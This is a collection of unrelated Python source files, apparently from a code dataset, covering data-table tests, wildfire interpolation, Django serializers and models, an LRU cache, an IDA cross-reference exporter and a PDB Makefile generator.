tbl = (DataTable(a=(1,2,1,2,3,1), b=(4,5,6,3,2,1),c=(6,7,8,1,2,3))
.order_by(desc(label("b")))
)
exp = DataTable(a=(1,2,1,2,3,1), b=(6,5,4,3,2,1), c=(8,7,6,1,2,3))
assert tbl == exp
def test_one_str():
tbl = (DataTable(a=(1,2,1,2,3,1), b=(4,5,6,3,2,1),c=list("abcdef"))
.order_by(label("b"))
)
exp = DataTable(a=(1,3,2,1,2,1), b=(1,2,3,4,5,6), c=list("fedabc"))
assert tbl == exp
def test_two():
tbl = (DataTable(b=(4,5,2,3,2,1),c=(6,7,8,1,2,3),a=(1,2,1,2,3,1))
.order_by(label("b"), desc(label("a")), label("c"), )
)
exp = DataTable( b=(1,2,2,3,4,5), c=(3,2,8,1,6,7),a=(1,3,1,2,1,2))
assert tbl == exp
def test_two_asc():
data = {"col1": np.array((1, 2, 3, 4, 5, 4, 3, 2, 1)),
"col2": np.array(list("abcdeabcd")),
"col3": np.array((10, 11, 9, 8, 7, 2, 12, 100, 1))}
tbl = (DataTable.from_dict(data)
.order_by(label("col1"), label("col2"))
)
exp = DataTable.from_dict({'col1': np.array([1, 1, 2, 2, 3, 3, 4, 4, 5]),
'col2': np.array(['a', 'd', 'b', 'c', 'b', 'c', 'a', 'd', 'e']),
'col3': np.array([10, 1, 11, 100, 12, 9, 2, 8, 7])})
assert tbl == exp
def test_two_asc_desc():
data = {"col1": np.array((1, 2, 3, 4, 5, 4, 3, 2, 1)),
"col2": np.array(list("abcdeabcd")),
"col3": np.array((10, 11, 9, 8, 7, 2, 12, 100, 1))}
tbl = (DataTable.from_dict(data)
.order_by(label("col1"), desc(label("col2")))
)
exp = DataTable.from_dict({'col1': np.array([1, 1, 2, 2, 3, 3, 4, 4, 5]),
'col2': np.array(['d', 'a', 'c', 'b', 'c', 'b', 'd', 'a', 'e']),
'col3': np.array([1, 10, 100, 11, 9, 12, 8, 2, 7])})
assert tbl == exp
| 2.546875 | 3 |
python/fire_rs/demo_front_interpolation.py | arthur-bit-monnot/fire-rs-saop | 13 | 12786792 | <reponame>arthur-bit-monnot/fire-rs-saop
"""Test fire front interpolation"""
# Copyright (c) 2019, CNRS-LAAS
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#
#
import itertools
import os
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm
import skimage.io
import skimage.draw
import skimage.measure
import scipy.interpolate
import fire_rs.geodata.environment as g_environment
import fire_rs.geodata.display as display
import fire_rs.rbf
from fire_rs.geodata.geo_data import GeoData
from fire_rs.firemodel.propagation import Environment, FirePropagation, TimedPoint
################################################################################
# World initialization
FIRERS_DATA_FOLDER = '/home/rbailonr/firers_data_porto'
FIRERS_DEM_DATA = os.path.join(FIRERS_DATA_FOLDER, 'dem')
FIRERS_WIND_DATA = os.path.join(FIRERS_DATA_FOLDER, 'wind')
FIRERS_LANDCOVER_DATA = os.path.join(FIRERS_DATA_FOLDER, 'landcover')
the_world = g_environment.World(elevation_path=FIRERS_DEM_DATA,
wind_path=FIRERS_WIND_DATA,
landcover_path=FIRERS_LANDCOVER_DATA, wind_mesh_resolution='fine',
landcover_to_fuel_remap=g_environment.SLOW_FUELMODEL_REMAP)
the_world.dem_wind_tile_split = 1
area = ((2776825.0 - 2500, 2776825.0 + 2500), (2212175.0 - 2500, 2212175.0 + 4500))
ignition = TimedPoint(2776825.0, 2212175.0, 0)
################################################################################
# Reference fire propagation
fire_env = Environment(area, 5., np.pi / 2, the_world)
fire_prop = FirePropagation(fire_env)
fire_prop.set_ignition_point(ignition)
propagation_end_time = 60 * 60 * 60
propagation_end_time = np.inf
fire_prop.propagate(propagation_end_time)
################################################################################
# Reference fire display
# Figure terrain + ignition contour + ignition point
gdd = display.GeoDataDisplay.pyplot_figure(
fire_env.raster.combine(fire_prop.ignitions().slice(["ignition"])), frame=(0., 0.))
gdd.draw_elevation_shade(with_colorbar=False, cmap=matplotlib.cm.terrain)
gdd.draw_wind_quiver()
gdd.draw_ignition_contour(with_labels=True, cmap=matplotlib.cm.plasma)
gdd.draw_ignition_points(ignition)
gdd.figure.show()
################################################################################
# Contour extraction
firemap = fire_prop.ignitions()
fire_image = np.ones(firemap.data.shape, dtype=np.float64) * np.NaN
firepoints = {}
# The ignition point is knwon
firepoints[fire_prop.ignitions().array_index((ignition[0], ignition[1]))] = ignition[2]
# Create contour with scikit-image
contours1 = skimage.measure.find_contours(firemap.data["ignition"], 21 * 60 * 60)
contours2 = skimage.measure.find_contours(firemap.data["ignition"], 20 * 60 * 60)
contours3 = skimage.measure.find_contours(firemap.data["ignition"], 22 * 60 * 60)
contours4 = skimage.measure.find_contours(firemap.data["ignition"], 40 * 60 * 60)
contours5 = skimage.measure.find_contours(firemap.data["ignition"], 41 * 60 * 60)
contours6 = skimage.measure.find_contours(firemap.data["ignition"], 42 * 60 * 60)
# Print contour as binary image
comp_cycle = itertools.cycle([lambda x, y: x < y, lambda x, y: x > y])
comp = next(comp_cycle)
for i in [contours1, contours2, contours3, contours4, contours5, contours6]:
comp = next(comp_cycle)
for contour in i:
for pt_i in range(len(contour)):
if comp(pt_i, len(contour) / 2):
continue
if pt_i % 1 == 0:
rr, cc = skimage.draw.line(*np.asarray(contour[pt_i - 1], dtype=int),
*np.asarray(contour[pt_i], dtype=int))
fire_image[rr, cc] = firemap.data["ignition"][rr[0], cc[0]]
for r, c in zip(rr, cc):
firepoints[r, c] = firemap.data["ignition"][r, c]
fig = plt.figure()
ax = fig.gca()
imag = ax.imshow(fire_image / 60.)
fig.colorbar(imag, ax=ax, shrink=0.65, aspect=20, format="%d minutes")
fig.show()
################################################################################
# Interpolate contour
x, y = list(zip(*firepoints.keys()))
z = tuple(firepoints.values())
function = 'thin_plate'
# function = 'linear'
# function = 'multiquadric'
# function = 'cubic'
# --function = lambda a: np.sin(a)
# Wildland fire modeling with an Eulerian level set method and automated calibration
# might give a clue of which kind of kernel function to use
zfun_smooth_rbf = fire_rs.rbf.Rbf(x, y, z, function=function, epsilon=0.1,
smooth=0) # default smooth=0 for interpolation
xi = np.linspace(0, firemap.data.shape[0] - 1, firemap.data.shape[0])
yi = np.linspace(0, firemap.data.shape[1] - 1, firemap.data.shape[1])
meshgrid = np.meshgrid(xi, yi, indexing="ij")
z_dense_smooth_rbf = zfun_smooth_rbf(
*[x.flatten() for x in meshgrid]) # not really a function, but a callable class instance
z_dense_smooth_rbf = z_dense_smooth_rbf.reshape(len(xi), len(yi))
################################################################################
# Display interpolation
fig = plt.figure()
ax = fig.gca()
levels = list(range(0, 70 * 60 * 60, 10 * 60 * 60))
ax.imshow(fire_image)
c1 = ax.contour(z_dense_smooth_rbf, levels=levels)
ax.clabel(c1)
c2 = ax.contour(firemap.data["ignition"], levels=levels, alpha=0.6)
# ax.imshow(z_dense_smooth_rbf - firemap.data["ignition"])
ax.clabel(c2)
ax.imshow(fire_image)
fig.show()
################################################################################
# Display error
fig = plt.figure()
ax = fig.gca()
levels = list(range(0, 70 * 60, 10 * 60))
diferencia = z_dense_smooth_rbf - firemap.data["ignition"]
# ax.imshow(firemap.data["ignition"])
# 150 min is 200m for wind 5km/h in wind direction
diff_image = ax.imshow(diferencia / 60., cmap=matplotlib.cm.seismic, vmin=-150, vmax=150)
cb = fig.colorbar(diff_image, ax=ax, shrink=0.65, aspect=20, format="%d minutes")
cb.set_label("Interpolation error")
ax.imshow(fire_image, cmap=matplotlib.cm.cool)
c2 = ax.contour(firemap.data["ignition"] / 60., levels=levels, cmap=matplotlib.cm.cool)
ax.clabel(c2)
# ax.imshow(fire_image)
fig.show()
################################################################################
# In 3D
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(121, projection='3d')
ax.plot_surface(*meshgrid, z_dense_smooth_rbf, color="blue")
fig.show()
ax = fig.add_subplot(122, projection='3d')
ax.plot_surface(*meshgrid, firemap.data["ignition"], color="red")
fig.show()
print("THE END")
| 1.203125 | 1 |
back_end/mlh/apps/headlines/serializers.py | 22014471/malonghui_Django | 1 | 12786793 | <gh_stars>1-10
import logging
from rest_framework import serializers
from activity.models import Activity
from headlines.models import HeadlinesCategory, HeadlinesNews, NewsComment, UserAttention, NewsCollection
from questions.models import Question, Tag
from talks.models import Talks
from users.models import User
class UserSerializer(serializers.ModelSerializer):
"""
用户序列化器1
"""
class Meta:
model = User
fields = ("id", "username", "avatar")
class NewsSerializer(serializers.ModelSerializer):
"""
新闻序列化器
"""
class Meta:
model = HeadlinesNews
fields = ("id", "title", "create_time")
class NewsCollectionSerializer(serializers.ModelSerializer):
"""
收藏序列化器
"""
user = UserSerializer()
class Meta:
model = NewsCollection
fields = ("user",)
class QuestionSerializer(serializers.ModelSerializer):
"""
头条详情作者问答排行序列化器
"""
class Meta:
model = Question
fields = ('id', 'title', 'update_time')
class AuthorAttentionSerializer(serializers.ModelSerializer):
"""
作者粉丝序列化器
"""
user = UserSerializer()
class Meta:
model = User
fields = ("id", 'user')
class HeadlineUserSerializer(serializers.ModelSerializer):
"""
用户序列化器2(用户新闻+用户粉丝)
"""
news = NewsSerializer(many=True)
attention = AuthorAttentionSerializer(many=True)
class Meta:
model = User
fields = ("id", "username", "avatar", 'news', 'attention')
class HeadlineAuthorSerializer(serializers.ModelSerializer):
"""
用户序列化器3(用户粉丝)
"""
attention = AuthorAttentionSerializer(many=True)
class Meta:
model = User
fields = ("id", "username", "avatar", 'attention')
class HeadlinesCategorySerializer(serializers.ModelSerializer):
"""
头条分类序列化器
"""
class Meta:
model = HeadlinesCategory
fields = ('id', 'name')
class HeadlinesNewsSerializer(serializers.ModelSerializer):
"""
头条新闻列表序列化器
"""
author = HeadlineAuthorSerializer()
class Meta:
model = HeadlinesNews
fields = ('id', 'title', 'author', 'create_time', 'content', "clicks")
class HeadlinesDetailSerializer(serializers.ModelSerializer):
"""
头条新闻详情序列化器
"""
author = HeadlineUserSerializer()
collected = NewsCollectionSerializer(many=True)
class Meta:
model = HeadlinesNews
fields = ('id', 'title', 'author', 'collected', 'create_time', 'content', "comment_count")
class CommentsSerializer(serializers.ModelSerializer):
"""
新闻评论序列化器
"""
user = UserSerializer()
class Meta:
model = NewsComment
fields = ('id', 'user', 'content')
class HeadlinesCommentsSerializer(serializers.ModelSerializer):
"""
头条新闻详情页评论序列化器
"""
user = UserSerializer()
child = CommentsSerializer(many=True)
class Meta:
model = NewsComment
fields = ('id', 'user', 'content', 'child', 'parent')
class HeadlinesCommentAddSerializer(serializers.ModelSerializer):
"""
评论添加序列化器
"""
class Meta:
model = NewsComment
fields = ('id', 'news', 'user', 'content', 'parent')
def create(self, validated_data):
"""
创建评论
"""
news= validated_data['news']
news.comment_count += 1
news.save()
return super().create(validated_data)
class HeadlinesQuestionSerializer(serializers.ModelSerializer):
"""
头条首页问答排行序列化器
"""
author = UserSerializer()
class Meta:
model = Question
fields = ('id', 'author', 'title', 'update_time')
class HeadlinesActivitiesSerializer(serializers.ModelSerializer):
"""
热门活动排行序列化器
"""
class Meta:
model = Activity
fields = ('id', 'cover', 'city', 'act_name', 'start_time')
class HeadlinesTalksSerializer(serializers.ModelSerializer):
"""
详情页吐槽排行序列化器
"""
class Meta:
model = Talks
fields = ('id', 'content')
class HeadlinesHotsSerializer(serializers.ModelSerializer):
"""
详情页热门头条排行序列化器
"""
class Meta:
model = HeadlinesNews
fields = ('id', 'title')
class HeadlinesUserAttention(serializers.ModelSerializer):
"""
用户关注作者序列化器
"""
class Meta:
model = UserAttention
fields = ('user', 'author')
def create(self, validated_data):
"""
创建关注保存
"""
user = validated_data['user']
author = validated_data['author']
# fans_list = author.attention.all() #作者的fans表
# user_attention = user.fun.all() #用户的attention表
# print(fans_list)
# print(user_attention)
# # 判断是否关注过
# for fan in fans_list:
# if user == fan.user:
# raise serializers.ValidationError('已关注该用户,请勿重复添加')
#判断作者是否存在
if not author:
raise serializers.ValidationError('没有该作者')
# 判断作者是否是用户自己
if author.id == user.id:
raise serializers.ValidationError('自己不能关注自己')
return super().create(validated_data)
class HeadlinesUserCollectionSerializer(serializers.ModelSerializer):
"""
用户收藏序列化器
"""
class Meta:
model = NewsCollection
fields = ('user', 'news')
def create(self, validated_data):
"""
创建收藏保存
"""
user = validated_data['user']
news = validated_data['news']
#判断作者是否存在
if not news:
raise serializers.ValidationError('没有该新闻')
# 判断作者是否是用户自己
if news.author == user:
raise serializers.ValidationError('不能收藏自己的新闻')
return super().create(validated_data)
class HeadlinesNewsAddSerializer(serializers.ModelSerializer):
"""
发布新闻序列化器
"""
class Meta:
model = HeadlinesNews
fields = ("title", 'category', 'author', 'content')
| 2.40625 | 2 |
paralleldomain/utilities/lazy_load_cache.py | parallel-domain/pd-sdk | 10 | 12786794 | import collections
import logging
import os
import re
from sys import getsizeof
from threading import Event, RLock
from typing import Any, Callable, Dict, Hashable, Tuple, TypeVar, Union
import numpy as np
from cachetools import Cache
from humanize import naturalsize
CachedItemType = TypeVar("CachedItemType")
logger = logging.getLogger(__name__)
SHOW_CACHE_LOGS = os.environ.get("SHOW_CACHE_LOGS", False)
class CacheFullException(Exception):
...
class CacheEmptyException(Exception):
...
class LazyLoadCache(Cache):
"""Least Recently Used (LRU) cache implementation."""
_marker = object()
def __init__(self, cache_name: str = "Default pd-sdk Cache", cache_max_size: str = "1GiB"):
self.cache_name = cache_name
self._maximum_allowed_bytes: int = byte_str_to_bytes(byte_str=cache_max_size)
logger.info(
f"Initializing LazyLoadCache '{cache_name}' with available "
f"space of {naturalsize(self._maximum_allowed_bytes)}."
)
self._key_load_locks: Dict[Hashable, Tuple[RLock, Event]] = dict()
self._create_key_lock = RLock()
Cache.__init__(self, maxsize=self._maximum_allowed_bytes, getsizeof=LazyLoadCache.getsizeof)
self.__order = collections.OrderedDict()
def get_item(self, key: Hashable, loader: Callable[[], CachedItemType]) -> CachedItemType:
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if key not in self:
if SHOW_CACHE_LOGS:
logger.debug(f"load key {key} to cache")
value = loader()
try:
self[key] = value
except CacheFullException as e:
logger.warning(f"Cant store {key} in Cache since no more space is left! {str(e)}")
return value
wait_event.set()
return value
return self[key]
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key: Hashable, cache_getitem: Callable[[Cache, Hashable], Any] = Cache.__getitem__):
value = cache_getitem(self, key)
if key in self: # __missing__ may not store item
self.__update(key)
return value
def __setitem__(self, key: Hashable, value, cache_setitem=Cache.__setitem__):
self._custom_set_item(key, value)
self.__update(key)
def _get_locks(self, key: Hashable) -> Tuple[RLock, Event]:
if key not in self._key_load_locks:
with self._create_key_lock:
if key not in self._key_load_locks:
self._key_load_locks[key] = (RLock(), Event())
return self._key_load_locks[key]
def _custom_set_item(self, key, value):
size = self.getsizeof(value)
if SHOW_CACHE_LOGS:
logger.debug(f"add item {key} with size {naturalsize(size)}")
if size > self.maxsize:
raise ValueError("value too large")
if key not in self._Cache__data or self._Cache__size[key] < size:
self.free_space_for_n_bytes(n_bytes=size)
if key in self._Cache__data:
diffsize = size - self._Cache__size[key]
else:
diffsize = size
self._Cache__data[key] = value
self._Cache__size[key] = size
self._Cache__currsize += diffsize
def __delitem__(self, key: Hashable, cache_delitem=Cache.__delitem__):
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if wait_event.is_set():
if SHOW_CACHE_LOGS:
logger.debug(f"delete {key} from cache")
cache_delitem(self, key)
del self.__order[key]
wait_event.clear()
def free_space_for_n_bytes(self, n_bytes: Union[float, int]):
try:
while n_bytes > self.free_space:
self.popitem()
except CacheEmptyException:
if n_bytes > self.free_space:
raise CacheFullException(
f"Cache is already empty but there is no more space left tho store {n_bytes}B!"
)
@property
def maxsize(self) -> int:
"""The maximum size of the cache."""
return self._maximum_allowed_bytes
@maxsize.setter
def maxsize(self, value: Union[str, int]):
if isinstance(value, int):
self._maximum_allowed_bytes = value
elif isinstance(value, str):
self._maximum_allowed_bytes: int = byte_str_to_bytes(byte_str=value)
else:
raise ValueError(f"invalid type for maxsite {type(value)}! Has to be int or str.")
logger.info(f"Changed '{self.cache_name}' available space to {naturalsize(self._maximum_allowed_bytes)}.")
# If size got smaller make sure cache is cleared up
self.free_space_for_n_bytes(n_bytes=0)
@property
def currsize(self) -> int:
"""The current size of the cache."""
return int(self._Cache__currsize)
@property
def free_space(self) -> int:
"""The maximum size of the caches free space."""
remaining_allowed_space = self.maxsize - self.currsize
return remaining_allowed_space
def popitem(self):
"""Remove and return the `(key, value)` pair least recently used."""
try:
it = iter(list(self.__order.keys()))
key = next(it)
except StopIteration:
raise CacheEmptyException("%s is empty" % type(self).__name__)
else:
del self[key]
def pop(self, key, default=_marker):
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if key in self:
value = self[key]
del self[key]
elif default is LazyLoadCache._marker:
raise KeyError(key)
else:
value = default
return value
def clear(self):
"D.clear() -> None. Remove all items from D."
try:
while True:
self.popitem()
except CacheEmptyException:
pass
def __update(self, key):
try:
self.__order.move_to_end(key)
except KeyError:
self.__order[key] = None
@staticmethod
def getsizeof(value, seen=None):
"""Return the size of a cache element's value."""
# handle recursion
if seen is None:
seen = set()
obj_id = id(value)
if obj_id in seen:
return 0
seen.add(obj_id)
size = getsizeof(value)
if hasattr(value, "__dict__"):
pass
# for k, v in value.__dict__.items():
# size += getsizeof(v)
elif isinstance(value, list):
for i in value:
size += LazyLoadCache.getsizeof(i, seen)
elif isinstance(value, dict):
for k, v in value.items():
size += LazyLoadCache.getsizeof(v, seen)
elif isinstance(value, np.ndarray):
size = value.nbytes
return size
def byte_str_to_bytes(byte_str: str) -> int:
split_numbers_and_letters = re.match(r"([.0-9]+)([kKMGTPEZY]*)([i]*)([bB]+)", byte_str.replace(" ", ""), re.I)
powers = {"": 0, "k": 1, "m": 2, "g": 3, "t": 4, "p": 5, "e": 6, "z": 7, "y": 8}
if split_numbers_and_letters is None:
raise ValueError(
f"Invalid byte string format {byte_str}. `byte_str` has to be an integer string followed by a byte unit."
)
number, power_letter, base_letter, bites_or_bytes = split_numbers_and_letters.groups()
bit_factor = 1 if bites_or_bytes == "B" else 1 / 8
base = 1024 if base_letter == "i" else 1000
power = powers[power_letter.lower()]
number = float(number)
total_bits = number * base**power * bit_factor
return int(total_bits)
cache_max_ram_usage_factor = float(os.environ.get("CACHE_MAX_USAGE_FACTOR", 0.1)) # 10% free space max
cache_max_size = os.environ.get("CACHE_MAX_BYTES", "1GiB")
if "CACHE_MAX_USAGE_FACTOR" in os.environ:
logger.warning(
"CACHE_MAX_USAGE_FACTOR is not longer supported! Use CACHE_MAX_BYTES instead to set a cache size in bytes!"
)
LAZY_LOAD_CACHE = LazyLoadCache(cache_max_size=cache_max_size)
| 2.125 | 2 |
fmojinja/awk/makefile/pdb_reformer.py | Taro-Imahiro/fmojinja | 0 | 12786795 | from ...mixin import TemplateRendererMixin
from ...__version__ import get_version
from argparse import ArgumentParser
class PdbReformer(TemplateRendererMixin):
@classmethod
def template(cls) -> str:
return f"# Generated by fmojinja version {get_version()}" + """
PREFIX := {{ prefix }}
PDB :={% for path in input_pdbs %} {{ path }}{% endfor %}
CHAIN_STARTS :={% for seq_id in chain_starts %} {{ seq_id }}{% endfor %}
FORMATTED_PDB := $(addsuffix .pdb, $(addprefix $(PREFIX), $(basename $(notdir $(PDB)))))
.PHONY: run
run: gen $(FORMATTED_PDB)
.PHONY: gen
gen: $(PREFIX) $(PREFIX)reformat.awk
$(PREFIX):
\tmkdir $(PREFIX)
$(PREFIX)reformat.awk:
\tpython -m fmojinja.awk pdb_reformer -c $(CHAIN_STARTS) > $@
define expr
$(PREFIX)$(basename $(notdir $(1))).pdb: $(1)
\tawk -f $(PREFIX)reformat.awk $(1) > $(PREFIX)$(basename $(notdir $(1))).pdb
endef
$(foreach i, $(PDB), $(eval $(call expr, $(i))))
.PHONY: clean
clean:
\trm $(PREFIX)*
"""
@classmethod
def set_arguments(cls, p: ArgumentParser) -> ArgumentParser:
p = super(PdbReformer, cls).set_arguments(p)
p.add_argument("-P", "--prefix", default="reformat_pdb/")
p.add_argument("-c", "--chain-starts", nargs="*", default=[])
p.add_argument("-i", "--input-pdbs", required=True, nargs="+")
return p
| 2.25 | 2 |
services/api/__init__.py | flaviohenriqu/chemical-image-generation | 0 | 12786796 | <gh_stars>0
# services/__init__.py
import os
import connexion
import logging
def create_app(script_info=None):
# instantiate the app
con_app = connexion.FlaskApp(__name__, specification_dir='docs/')
con_app.add_api('api.yaml', options={'swagger_url': '/docs'})
# set config
app_settings = os.getenv('APP_SETTINGS')
con_app.app.config.from_object(app_settings)
return con_app
| 1.945313 | 2 |
viz/all-crossrefs-idb.py | cloakware-ctf/idascripts | 11 | 12786797 | <gh_stars>10-100
# Copyright 2016-2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import idascript
import sys
import os
import traceback
import idaapi
import logging
import sark
import json
# [ { label: 'label1', edges: { ea: { name: 'name', xrefs_from : { ... } } } },
# ...
# ]
logger = logging.getLogger(__name__)
if not logger.handlers:
handler = logging.StreamHandler(stream=sys.stdout)
logger.addHandler(handler)
try:
Wait()
all_functions = dict()
# all functions
for seg_ea in Segments():
for function_ea in Functions(seg_ea, SegEnd(seg_ea)):
all_functions.update({ str(function_ea): { 'name': GetFunctionName(function_ea) }})
# add cross-refs
unknown_functions = {};
for ea in all_functions.keys():
this_function = sark.Function(int(ea))
xrefs_from = dict()
for xref in this_function.xrefs_from:
if not xref.iscode:
continue
try:
xrefs_from.update({ str(xref.to) : sark.Function(xref.to).ea})
except sark.exceptions.SarkNoFunction:
print "unknown xref target function at 0x%x" % xref.to
# add unknown functions
unknown_functions.update({ str(xref.to): { 'name': 'unknown' , 'xrefs_from': {} }})
xrefs_from.update({ str(xref.to) : xref.to})
all_functions.get(ea).update({ 'xrefs_from': xrefs_from })
all_functions.update(unknown_functions);
# collect all exports in a dict by 'ea' , remove them from above all-functions dict
all_exports = dict()
for index, ordinal, ea, name in idautils.Entries():
if all_functions.get(str(ea)) is not None:
all_exports.update({ str(ea): all_functions.pop(str(ea)) })
# collect all imports in a dict by 'ea' , remove them from above all-functions dict
all_imports = dict()
for ea in all_functions.keys():
seg_name = idc.SegName(int(ea))
if seg_name in ['extern']:
all_imports.update({ea: all_functions.pop(ea)})
groups_of_functions = []
groups_of_functions.append({
'label': 'exports',
'edges': all_exports
})
groups_of_functions.append({
'label': 'others',
'edges': all_functions
})
groups_of_functions.append({
'label': 'imports',
'edges': all_imports
})
name, extension = os.path.splitext(idaapi.get_input_file_path())
fd_out = open(name+'_allxrefs.json', 'w')
fd_out.write(json.dumps(groups_of_functions, indent=2, sort_keys=False))
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error("Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))
idascript.exit()
| 1.867188 | 2 |
tests/test_files_process_save.py | efratkohen/Project | 1 | 12786798 | <reponame>efratkohen/Project<filename>tests/test_files_process_save.py
from files_process_save import *
import clean_data_svi as cds
import pathlib
import pytest
def test_valid_input():
fname = pathlib.Path(__file__)
q = check_file(fname)
assert fname == q
def test_str_input():
q = check_file(__file__)
assert pathlib.Path(__file__) == q
def test_missing_file():
fname = pathlib.Path('test.fd')
with pytest.raises(ValueError):
check_file(fname)
def test_wrong_input_type():
fname = 2
with pytest.raises(TypeError):
check_file(pathlib.Path(fname))
def test_split_microscopic_to_reactor_len():
length = 4
micro_path = check_file('microscopic_data.csv')
data = read_data(micro_path)
data_microscopic = split_microscopic_to_reactor(data)
assert len(data_microscopic) == length
def test_split_microscopic_to_reactor_column_name():
column_names = [
"date",
"ameoba_arcella",
"ameoba_nude ameba",
"crawling ciliates_aspidisca",
"crawling ciliates_trachelopylum",
"free swimming ciliates_lionutus",
"free swimming ciliates_paramecium",
"stalked ciliate_epistylis",
"stalked ciliate_vorticella",
"stalked ciliate_carchecium",
"stalked ciliate_tokophyra",
"stalked ciliate_podophyra",
"stalked ciliate_opercularia",
"rotifer_rotifer",
"worms_nematode",
"flagellates_peranema trich",
"flagellates_micro flagellates",
"worms_worms",
"spirochaetes_spirochaetes",
"Total Count- amoeba",
"Total Count- Crawling Ciliates",
"Total Count- Free swimming Ciliates",
"Total Count- Stalked Ciliates",
"Total Count- Rotifers",
"Total Count- Worms",
"Total Count- Spirochaetes",
"Total Count- Flagellats",
"Total Count- Filaments",
"Filaments_Nocardia_index",
"Filaments_Microthrix_index",
"Filaments_N. Limicola_index",
"Filaments_Thiothrix_index",
"Filaments_0041/0675_index",
"Filaments_0092_index",
"Filaments_1851_index",
"Filaments_beggiatoa_index",
"Filaments_zoogloea_index",
]
micro_path = check_file('microscopic_data.csv')
data = read_data(micro_path)
data_microscopic = split_microscopic_to_reactor(data)
assert list(data_microscopic[0].columns) == column_names
def test_split_svi_to_reactor_column_names():
columns_names = ['date', 'Settling_velocity', 'SVI']
svi_path = check_file('SVI.csv')
data = read_data(svi_path)
data_svi_computed = cds.svi_calculate(data)
data_svi = split_svi_to_reactor(data_svi_computed)
assert list(data_svi[0].columns) == columns_names
def test_split_svi_to_reactor_len():
length = 4
svi_path = check_file('SVI.csv')
data = read_data(svi_path)
data_svi_computed = cds.svi_calculate(data)
data_svi = split_svi_to_reactor(data_svi_computed)
assert len(data_svi) == length
def test_clean_table_SVI_dates():
"Check that every row is a day and there are no gaps"
days_list= []
length_list = []
for i in range(4):
svi_path = check_file(f"clean_tables/svi_{i+1}.csv")
data = pd.read_csv(svi_path)
data["date"] = pd.to_datetime(data["date"], dayfirst=True)
df = data["date"]
length_list.append(len(df))
days = df.diff().sum().days
days_list.append(days+1)
assert days_list == length_list
def test_clean_table_temperature_dates():
"Check that every row is a day and there are no gaps"
days_list= []
length_list = []
temp_path = check_file(f"clean_tables/temperatur.csv")
data = pd.read_csv(temp_path)
data["Date"] = pd.to_datetime(data["Date"], dayfirst=True)
df = data["Date"]
length = len(df)
days = df.diff().sum().days
assert days +1 == length | 2.46875 | 2 |
address/models.py | wendell1101/EcommerceProject---Django | 0 | 12786799 | <gh_stars>0
from django.db import models
from customer_profiles.models import CustomerProfile
from django_countries.fields import CountryField
class BillingAddress(models.Model):
customer_profile = models.ForeignKey(CustomerProfile, on_delete=models.CASCADE)
house_number = models.CharField(max_length=120)
street = models.CharField(max_length=200)
barangay = models.CharField(max_length=200)
city = models.CharField(max_length=200)
province = models.CharField(max_length=200)
zip_code = models.CharField(max_length=200)
country = CountryField(blank_label='(select country)')
timestamp = models.DateTimeField(auto_now_add=True, blank=True)
def __str__(self):
return self.customer_profile.user.email
def get_full_address(self):
return f'{self.house_number}, {self.street}, {self.barangay}, {self.city} city, {self.province}, {self.country}'
class ShippingAddress(models.Model):
customer_profile = models.ForeignKey(CustomerProfile, on_delete=models.CASCADE)
house_number = models.CharField(max_length=120)
street = models.CharField(max_length=200)
barangay = models.CharField(max_length=200)
city = models.CharField(max_length=200)
province = models.CharField(max_length=200)
zip_code = models.CharField(max_length=200)
country = CountryField(blank_label='(select country)')
timestamp = models.DateTimeField(auto_now_add=True, blank=True)
def __str__(self):
return self.customer_profile.user.email
def get_full_address(self):
return f'{self.house_number}, {self.street}, {self.barangay}, {self.city} city, {self.province}, {self.country}'
class DefaultAddress(models.Model):
customer_profile = models.ForeignKey(CustomerProfile, on_delete=models.CASCADE)
house_number = models.CharField(max_length=120)
street = models.CharField(max_length=200)
barangay = models.CharField(max_length=200)
city = models.CharField(max_length=200)
province = models.CharField(max_length=200)
zip_code = models.CharField(max_length=200)
country = CountryField(blank_label='(select country)')
timestamp = models.DateTimeField(auto_now_add=True, blank=True)
def __str__(self):
return self.customer_profile.user.email
def get_full_address(self):
return f'{self.house_number}, {self.street}, {self.barangay}, {self.city} city, {self.province}, {self.country}' | 2.203125 | 2 |
src/bot/gameobservers/tests/test_game_end_observers.py | malmgrens4/TwIOTch | 0 | 12786800 | import pytest
from unittest import mock
from unittest.mock import AsyncMock, MagicMock
from src.bot.gameobservers.WinGameChatObserver import WinGameChatObserver
class TestNumberGameObservers:
